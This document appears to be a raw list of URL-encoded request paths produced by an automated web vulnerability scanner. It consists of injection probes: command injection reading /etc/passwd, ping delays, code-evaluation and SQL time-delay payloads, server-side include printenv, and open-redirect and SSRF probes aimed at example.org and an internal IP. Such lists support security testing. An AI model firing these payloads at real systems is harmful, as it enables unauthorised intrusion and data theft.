/
/%20%252fbin%252fcat%20%252fetc%252fpasswd
/%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/%20%60ping%20-c%206%20localhost%60
/%20%60ping%20-c%206%20localhost%60/
/%20ping%20-c%206%20localhost
/%20ping%20-c%206%20localhost/
/%20ping%20-n%206%20localhost
/%20ping%20-n%206%20localhost/
/%20run%20ping%20-n%206%20localhost
/%20run%20ping%20-n%206%20localhost/
/%22
/%22%3becho%201889409%2b1889409%3b
/%22%3becho%201889409%2b1889409%3b%23
/%22%3bprint%201889409%2b1889409
/%22%3bprint%201889409%2b1889409%23
/%22%3bprint%201889409%2b1889409%3b
/%22%3bprint%201889409%2b1889409%3b%23
/%22%3bputs%201889409%2b1889409
/%22%3bputs%201889409%2b1889409%23
/%22%3bResponse.Write(1889409%2b1889409)
/%22%3bResponse.Write(1889409%2b1889409)'
/%22'%3e%3c!--%23printenv%20--%3e
/%22'%3e%3c!--%23printenv%20--%3e/
/%23%5e(%24!%40%24)(()))******
/%23%5e(%24!%40%24)(()))******/
/%24%7b4674984%2b4674984%7d/
/%24%7b8590556%2b8590556%7d
/%252f
/%252f%252f192.168.1.106.example.org
/%252f%252f192.168.1.106.example.org/
/%252f%252f192.168.1.106.fpwzyqmc
/%252f%252f192.168.1.106.fpwzyqmc/
/%252f%252fexample.org
/%252f%252fexample.org/
/%252f/
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%26%26%20ping%20-c%206%20localhost
/%26%26%20ping%20-c%206%20localhost/
/%26%26%20ping%20-n%206%20localhost
/%26%26%20ping%20-n%206%20localhost/
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%3b%20ping%20-c%206%20localhost
/%3b%20ping%20-c%206%20localhost/
/%3b%20ping%20-n%206%20localhost
/%3b%20ping%20-n%206%20localhost/
/%3becho%201889409%2b1889409%3b
/%3becho%201889409%2b1889409%3b%23
/%3bprint%201889409%2b1889409
/%3bprint%201889409%2b1889409%23
/%3bprint%201889409%2b1889409%3b
/%3bprint%201889409%2b1889409%3b%23
/%3bputs%201889409%2b1889409
/%3bputs%201889409%2b1889409%23
/%3bResponse.Write(1889409%2b1889409)
/%3bResponse.Write(1889409%2b1889409)'
/%3bwaitfor%20delay%20'0%3a0%3a5'--
/%3c!--%23printenv%20--%3e
/%3c!--%23printenv%20--%3e/
/%3c!--'%22a
/%3c!--'%22a/
/%3ch%20xhx%3dyhy%3e
/%3ch%20xhx%3dyhy%3e/
/%5c
/%5c/
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%7c%20ping%20-c%206%20localhost
/%7c%20ping%20-c%206%20localhost/
/%7c%20ping%20-n%206%20localhost
/%7c%20ping%20-n%206%20localhost/
/'
/'%3becho%201889409%2b1889409%3b
/'%3becho%201889409%2b1889409%3b%23
/'%3bprint%201889409%2b1889409
/'%3bprint%201889409%2b1889409%23
/'%3bprint%201889409%2b1889409%3b
/'%3bprint%201889409%2b1889409%3b%23
/'%3bputs%201889409%2b1889409
/'%3bputs%201889409%2b1889409%23
/'%3bResponse.Write(1889409%2b1889409)
/'%3bResponse.Write(1889409%2b1889409)'
/(
/)
/)%3bwaitfor%20delay%20'0%3a0%3a5'--
/))%3bwaitfor%20delay%20'0%3a0%3a5'--
/0-a
/0-b
/1%2b2
/1-1
/11-5
/12-6
/123
/192.168.1.106.example.org
/192.168.1.106.example.org/
/2%2b1
/2%2b6
/2-2
/3%2b5
/3%2ba
/3%2bb
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/5%3bURL%3d'http%3a%252f%252fexample.org'
/5%3bURL%3d'http%3a%252f%252fexample.org'/
/aaa
/aaa/
/echo%201889409%2b1889409%3b
/echo%201889409%2b1889409%3b%23
/example.org
/example.org/
/eziepwlivt
/eziepwlivt/
/file%3a%252faaa
/file%3a%252faaa/
/fpwzyqmc
/fpwzyqmc/
/http%3a%252f%252f192.168.1.106.example.org
/http%3a%252f%252f192.168.1.106.example.org/
/http%3a%252f%252f192.168.1.106.fpwzyqmc
/http%3a%252f%252f192.168.1.106.fpwzyqmc/
/http%3a%252f%252fexample.org
/http%3a%252f%252fexample.org/
/http%3a%252f%252fr39637803577395483937.example.org
/http%3a%252f%252fr39637803577397158689.example.org%252f
/http%3a%252f%252fr39637803577399536586.example.org%252fa
/http%3a%252f%252fwww.iana.org
/http%3a%252f%252fwww.iana.org%252f
/http%3a%252f%252fwww.iana.org%252fa
/https%3a%252f%252f192.168.1.106.example.org
/https%3a%252f%252f192.168.1.106.example.org/
/https%3a%252f%252f192.168.1.106.fpwzyqmc
/https%3a%252f%252f192.168.1.106.fpwzyqmc/
/https%3a%252f%252fexample.org
/https%3a%252f%252fexample.org/
/https%3a%252f%252fr39637803577401584610.example.org
/https%3a%252f%252fr39637803577403210035.example.org%252f
/https%3a%252f%252fr39637803577404731872.example.org%252fa
/https%3a%252f%252fwww.iana.org
/https%3a%252f%252fwww.iana.org%252f
/https%3a%252f%252fwww.iana.org%252fa
/localhost%3a65533
/localhost%3a65533/
/localhost%3a65534
/localhost%3a65534/
/localhost%3a65555
/localhost%3a65555/
/localhost%3a66666
/localhost%3a66666/
/mmmm4mmmmmmm/
/print%201889409%2b1889409
/print%201889409%2b1889409%23
/print%201889409%2b1889409%3b
/print%201889409%2b1889409%3b%23
/puts%201889409%2b1889409
/puts%201889409%2b1889409%23
/r39637803577390284079.example.org
/r39637803577391965119.example.org%252f
/r39637803577393736310.example.org%252fa
/Response.Write(1889409%2b1889409)
/Response.Write(1889409%2b1889409)'
/should_not_xist_bbbbbbbbbb
/should_not_xist_cccccccccc
/should_not_xist_dddddddddd
/should_not_xist_eeeeeeeeee
/should_not_xist_ggggggggggg
/should_not_xist_hhhhhhhhhhh
/should_not_xist_jjjjjjjjjjjj
/should_not_xist_ooooooooooooo
/should_not_xist_ppppppppppppp
/should_not_xist_qqqqqqqqqqqqq
/should_not_xist_yyyyyyyyyyyyyyy
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/URL%3d'http%3a%252f%252fexample.org'
/URL%3d'http%3a%252f%252fexample.org'/
/UTF-7
/UTF-7/
/UTF-8
/UTF-8/
/uuuu3uuuuuu
/w%20'eb
/w%2b'eb
/w%7c%7c'eb
/w'%20'eb
/w'%2b'eb
/web
/web%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/web%20%60ping%20-c%206%20localhost%60
/web%20%60ping%20-c%206%20localhost%60/
/web%20ping%20-c%206%20localhost
/web%20ping%20-c%206%20localhost/
/web%20ping%20-n%206%20localhost
/web%20ping%20-n%206%20localhost/
/web%20run%20ping%20-n%206%20localhost
/web%20run%20ping%20-n%206%20localhost/
/web%22'%3e%3c!--%23printenv%20--%3e
/web%22'%3e%3c!--%23printenv%20--%3e/
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%26%26%20ping%20-c%206%20localhost
/web%26%26%20ping%20-c%206%20localhost/
/web%26%26%20ping%20-n%206%20localhost
/web%26%26%20ping%20-n%206%20localhost/
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%3b%20ping%20-c%206%20localhost
/web%3b%20ping%20-c%206%20localhost/
/web%3b%20ping%20-n%206%20localhost
/web%3b%20ping%20-n%206%20localhost/
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%7c%20ping%20-c%206%20localhost
/web%7c%20ping%20-c%206%20localhost/
/web%7c%20ping%20-n%206%20localhost
/web%7c%20ping%20-n%206%20localhost/
/web/
/web/should_not_xist_bbbbbbbbbb
/web/should_not_xist_hhhhhhhhhhh
/web/should_not_xist_jjjjjjjjjjjj
/web/should_not_xist_mmmmmmmmmmmm
/web/should_not_xist_tttttttttttttt
/web/should_not_xist_vvvvvvvvvvvvvvv
/web/should_not_xist_wwwwwwwwwwwwwww
/web/should_not_xist_yyyyyyyyyyyyyyy
/www.iana.org
/www.iana.org%252f
/www.iana.org%252fa
